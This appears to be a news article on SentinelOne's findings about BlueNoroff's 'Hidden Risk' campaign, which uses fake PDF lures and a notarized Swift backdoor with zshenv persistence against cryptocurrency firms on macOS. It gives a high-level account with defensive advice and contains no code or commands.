North Korean cybercriminals have intensified their focus on the cryptocurrency sector through a new sophisticated malware campaign identified as “Hidden Risk,” according to recent findings by cybersecurity firm SentinelOne. The attack is attributed to the state-sponsored threat actor group known as BlueNoroff, which operates as a subgroup of the notorious Lazarus Group associated with North Korea.
Since July 2024, BlueNoroff has employed targeted email strategies and deceptive PDF lures to attract victims in the cryptocurrency and decentralized finance (DeFi) spaces. These lures often feature fictional news articles with titles such as “Hidden Risk Behind New Surge of Bitcoin Price” and “New Era for Stablecoins and DeFi, CeFi.” The attackers have notably leveraged these techniques to exploit the prevalence of PDF documents as trusted communication tools within the industry.
The malware operation begins with a meticulously crafted phishing email that entices the recipient to click on a hyperlink leading to a seemingly legitimate PDF document. However, this document is designed to deliver a disguised malicious application written in Swift, which is presented as a PDF reader but is, in fact, a backdoor for the attackers. This application has been notarized by Apple, circumventing typical gatekeeping security measures.
Once activated, the malicious application stealthily downloads a decoy PDF titled “Hidden Risk” while simultaneously executing a malicious x86-64 binary identified as “growth.” This binary is persistently installed on the infected system and establishes itself as a backdoor, harvesting sensitive data, maintaining communication with a command-and-control server, and enabling the execution of external commands.
To sustain its presence, the malware modifies the Zsh configuration file (zshenv), a file that is executed during every Zsh session, allowing the backdoor’s code to remain active even after system reboots. This particular persistence technique underscores the attackers’ intent to maintain long-term access to compromised systems.
SentinelOne’s research has tied this campaign closely to BlueNoroff due to the shared tactics reflected in previous operations, including the parsing of commands and the use of hidden files for data exfiltration. Further investigation into the campaign’s infrastructure ties it to domain registrations and services previously exploited by BlueNoroff, reinforcing the linkage. The malware also utilizes a User-Agent string associated with the group’s earlier “RustBucket” malware, further establishing a pattern indicative of their operational methodology.
As BlueNoroff continues to threaten cryptocurrency exchanges, venture capital firms, and banking institutions, the utilization of PDF lures illustrates their strategy of leveraging widely accepted document formats to execute cyberattacks. Recent revelations have also indicated other BlueNoroff-associated malware, such as TodoSwift and ObjCShellz, targeting macOS systems to facilitate remote command execution.
To mitigate exposure to such threats, it is crucial for business owners and their teams to exercise caution when handling unsolicited communications, particularly those from unfamiliar addresses. Verifying the authenticity of email sources, remaining vigilant about unexpected attachments, and maintaining up-to-date security protocols are essential preventive measures against the evolving landscape of cyber threats. Given the marked increase in attacks targeting macOS, organizations must prioritize awareness and education around these risks to fortify their cybersecurity posture.
The tactics observed within the “Hidden Risk” campaign could be classified using the MITRE ATT&CK framework, emphasizing categories such as initial access through phishing and existing access via persistence techniques. Understanding these tactics will help inform effective defense strategies and preparedness against potential future attacks.
